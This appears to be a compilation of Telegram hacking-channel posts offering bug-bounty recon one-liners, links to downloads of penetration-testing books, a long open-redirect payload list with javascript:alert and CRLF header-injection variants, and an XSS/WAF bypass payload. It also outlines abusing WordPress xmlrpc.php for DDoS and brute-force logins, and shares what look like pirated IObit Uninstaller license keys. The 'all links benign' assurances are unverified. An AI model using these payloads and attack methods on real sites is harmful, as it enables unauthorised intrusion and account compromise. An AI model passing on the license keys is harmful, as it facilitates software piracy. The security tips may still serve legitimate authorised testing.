Termux All Command [Telegram Group]

JS Recon : WaybackURLs & HTTPX waybackurls url | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} python lazyegg[.]py "{}" --js_urls --domains --ips > urls && cat urls | grep '\.' | sort -u | xargs -I{} httpx -silent -u {} -sc -title -td Do not forget to React ❤️ to this Message for More Content Like this .

[𝟏𝟐 𝐁𝐎𝐎𝐊𝐒 𝐎𝐅 𝐇𝐀𝐂𝐊𝐈𝐍𝐆 𝐀𝐍𝐃 𝐏𝐄𝐍𝐄𝐓𝐑𝐀𝐓𝐈𝐎𝐍 𝐓𝐄𝐒𝐓𝐈𝐍𝐆 : 𝐁𝐄𝐆𝐈𝐍𝐍𝐄𝐑𝐒 𝐓𝐎 𝐀𝐃𝐕𝐀𝐍𝐂𝐄 ] ✔️ All links posted here are just shared from other available media and all of them are benign ✔️ 1. Gray Hat Hacking The Ethical Hacker’s Handbook. ⛔️https://lnkd.in/dXYJriEG 2. Gray Hat Hacking: The Ethical Hacker’s Handbook, Fifth Edition ⛔️https://lnkd.in/dx-z3eqn 3. Gray Hat Hacking: The Ethical Hacker’s Handbook, Fourth Edition ⛔️https://lnkd.in/duwdhUwq 4. Gray Hat Hacking: The Ethical Hacker’s Handbook, Second Edition. ⛔️https://lnkd.in/dmYhinjD 5. Penetration Testing: A Survival Guide. ⛔️https://lnkd.in/d2v3ykw6 6. Mastering Modern Web Penetration Testing. ⛔️https://lnkd.in/d7skwMTF 7. THE HACKER PLAYBOOK 2 Practical Guide To Penetration Testing. ⛔️https://lnkd.in/ddagnRyG 8. The Basics of hacking and penetration testing. ⛔️https://lnkd.in/deAFkz_w 9. Quick Start Guide to Penetration Testing. ⛔️https://lnkd.in/dVrXMSZ5 10. ETHICAL HACKING AND PENETRATION TESTING GUIDE. ⛔️https://lnkd.in/d8swSeft 11. . ETHICAL HACKING 101 How to conduct professional pentestings in 21 days or less! ⛔️https://lnkd.in/dMJAx-Jc 12. HackLOG Security & Ethical Hacking Handbook VOLUME 1 ANONYMITY ⛔️https://lnkd.in/dkKnizGa . . . 🚨🚨 𝐒𝐇𝐀𝐑𝐄 - Do you know other resources? Please share them in the comment🚨🚨

You should read these new articles. 1- Story of Http password reset link for $500 https://lnkd.in/dbGwbMWt 2- A Story of Zero-click Complete Account Takeover Via Response Manipulation https://lnkd.in/d26DQ5cN 3- Penetration Testing with Termux: A Newbie’s Success Story https://lnkd.in/dRmBUDrX 4- Inside JSON Web Tokens (JWT): Security Insights and Exploits https://lnkd.in/dt2ikHvh 5- Mastering Subdomain Takeovers https://lnkd.in/dUB7zXqm 6- How to Detect if Your Mobile Phone Has Been Hacked: Signs and Steps to Take https://lnkd.in/dMHhFUbS

IObit Uninstaller Keys

> Status: Active ✅ > Version: Pro 13.x > Download: Click Here > 30C81-393A2-7DBAF-390TC > Expires On: 8 Nov, 2024 > 6E25C-21F89-7F62B-D86BC > Expires On: 16 Oct, 2024 > F6741-F743C-7CE93-3C8TC > Expires On: 20 June, 2024 > DB978-6E333-B12DC-7BDTC > Expires On: 14 June, 2024 > 11242-C437D-DE013-6E6TC > Expires On: 30 May, 2024

🔛 All the links posted here are benign 🔛 1. The Tangled Web. A Guide to Securing Modern Web Applications 🤓 https://lnkd.in/dfXn2u3f 2. Web App Hacking (Hackers Handbook 🤓 https://lnkd.in/dtMx8hZD 3. Pentesting Azure Applications. 🤓 https://lnkd.in/dxbWzRjY 4. Gray Hat C# a Hacker’s Guide to Creating and automating Security tools by Brandon Perry 🤓 https://lnkd.in/dpGxAuZx 5. Linux Command Line and Shell Scripting Bible (Massive Guide 1052 pags) 🤓 https://lnkd.in/dRBfKR6x 6. Nmap Official Guide+ Scripts. 🤓 https://lnkd.in/dyHfjvEB 7. Antivirus Hackers handbook. 🤓 https://lnkd.in/dBb2bv6W 8. Network Security Bible. 🤓 https://lnkd.in/dyUvi7xx 9. Hacking Bible 🤓 https://lnkd.in/d8FJxvEr

Open redirect payloads # Payloads to detect open redirection <>//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ //;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ /////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/ /////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ ////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ// ////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/ ///\;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ ///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ// ///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/ ///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ //\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/ //Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ// //Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/ //Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ /.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ /\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/ /〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ .Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ @Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ \/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/ 〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ //Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%00｡Ｐⓦ %01https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ %01https://google.com ////%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ ///%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ //%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ /%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ ////%09/google.com ///%09/google.com //%09/google.com /%09/google.com /%09/javascript​:alert(1); /%09/javascript​:alert(1) ////%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ ///%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ //%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ /%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ ////%09/whitelisted.com@google.com ///%09/whitelisted.com@google.com //%09/whitelisted.com@google.com /%09/whitelisted.com@google.com &%0d%0a1Location:https://google.com \152\141\166\141\163\143\162\151\160\164\072alert(1) %19Jav%09asc%09ript:https%20://https://lnkd.in/g23S7aus ////216.58.214.206 ///216.58.214.206 //216.58.214.206 /\216.58.214.206 /216.58.214.206 216.58.214.206 ////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e ///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e ////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f ///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f //Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f ////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f.. ///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f.. //Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f.. %2f216.58.214.206// %2f216.58.214.206 %2f216.58.214.206%2f%2f ////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e ///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e //Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e /Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e //%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ /%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ %2f$2f216.58.214.206 $2f%2f216.58.214.206%2f%2f %2f$2f3627734734 $2f%2f3627734734%2f%2f //%2f%2fgoogle.com /%2f%2fgoogle.com $2f%2fgoogle.com %2f$2fgoogle.com $2f%2fgoogle.com%2f%2f %2f3627734734// %2f3627734734 %2f3627734734%2f%2f /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ /%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/ %2fgoogle.com// %2fgoogle.com %2fgoogle.com%2f%2f ////3627734734 ///3627734734 //3627734734 /\3627734734 /3627734734 3627734734 //3H6k7lIAiqjfNeN@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/ //3H6k7lIAiqjfNeN@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/ //3H6k7lIAiqjfNeN@whitelisted.com@google.com/ //3H6k7lIAiqjfNeN@whitelisted.com+@google.com/ ////%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ ///%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ //%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ /%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ ////%5cgoogle.com ///%5cgoogle.com //%5cgoogle.com /%5cgoogle.com //%5cjavascript​:alert(1); //%5cjavascript​:alert(1) /%5cjavascript​:alert(1); ///%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ

Hiii hug hunters Today I Found IDOR I found JS file /static/js/main.a32c4.js Ctrl+F I search for /admin i found path adminuser Tips: Use this commands to extract js endpoints waybackurls “example.com” | grep -Eo ‘https?://[^/]+/[^”]+\.js’ | sed ‘s|^https\?://[^/]\+/’ | awk -F ‘/’ ‘{print $NF}’ > JSEndpoints waybackurls "example.com": This command retrieves URLs associated with "example.com" from the Wayback Machine archives. grep -Eo 'https?://[^/]+/[^"]+\.js': This command searches for URLs with a .js extension. The -E flag enables extended regular expressions, and the -o flag tells grep to output only the matching parts. sed 's|^https\?://[^/]\+/': This command removes the protocol (http:// or https://) and domain name from each URL, leaving only the path. awk -F '/' '{print $NF}': This command extracts the last part of each URL after splitting it by /, effectively removing the domain part. Try to use the JSEndponits with dirsearch useful for directory listing Dirsearch -u https://example.com -w JSEndponits

Check out xss bypass payload using console.log 😎 XSS

Back Again After a Short Break!!

Bug Bounty Tips 1. waybackurls target.com | grep = | urless | anew | tee param.txt 2. cat param.txt | nuclei -t fuzzing-templates -dast

" TEETO " A simple and completely free extension to quickly analyse a web page. Finds endpoints (URLs), secrets (API-keys etc) and URL parameters. : https://chromewebstore.google.com/detail/teeto/jkonpljnfkapenfcfdhmilkbmnbalnml

subfinder - d canva.com -silent | httpx -silent | hakrawler -u | grep "canva.com"

SQL injection to XSS bypass + CloudFlare bypass Payload: '<00 foo="XSS-CLick--%20/

Tips :- 🚨X-Recon: A utility for detecting webpage inputs and conducting XSS scans.🚨 Features: 1. Subdomain Discovery 2. Site-wide Link Discovery 3. Form and Input Extraction 4. XSS Scanning 🔗Link: https://lnkd.in/gfAeBPz7

Exploiting Wordpress XML-RPC file The XMLRPC is a system that allows remote updates to WordPress from other applications. For instance, the Windows Live Writer system is capable of posting blogs directly to WordPress because of xmlrpc.php. In essence, xmlrpc.php could open the site to various attacks and other issues. The XML-RPC API that WordPress provides gives developers a way to write applications (for you) that can do many of the things that you can do when logged into WordPress via the web interface. These include: Publish a post Edit a post Delete a post. Upload a new file (e.g. an image for a post) Get a list of comments Edit comments DDOS ATTACK Now, considering that file discussed above could potentially be abused to cause a DDOS attack against a victim host. This is achieved by simply sending a request that looks like below. BRUTEFORCE ATTACK To perform a bruteforce login attack, send the following in the POST request, if you know any valid usernames that would be even better (wp-scan would help). Though you should always get a 200 OK response, you should be able to tell if the login you entered on the intruder is correct. Remediation: If the XMLRPC.php file is not being used, it should be disabled and removed completely to avoid any potential risks. Otherwise, it should at the very least be blocked from external access.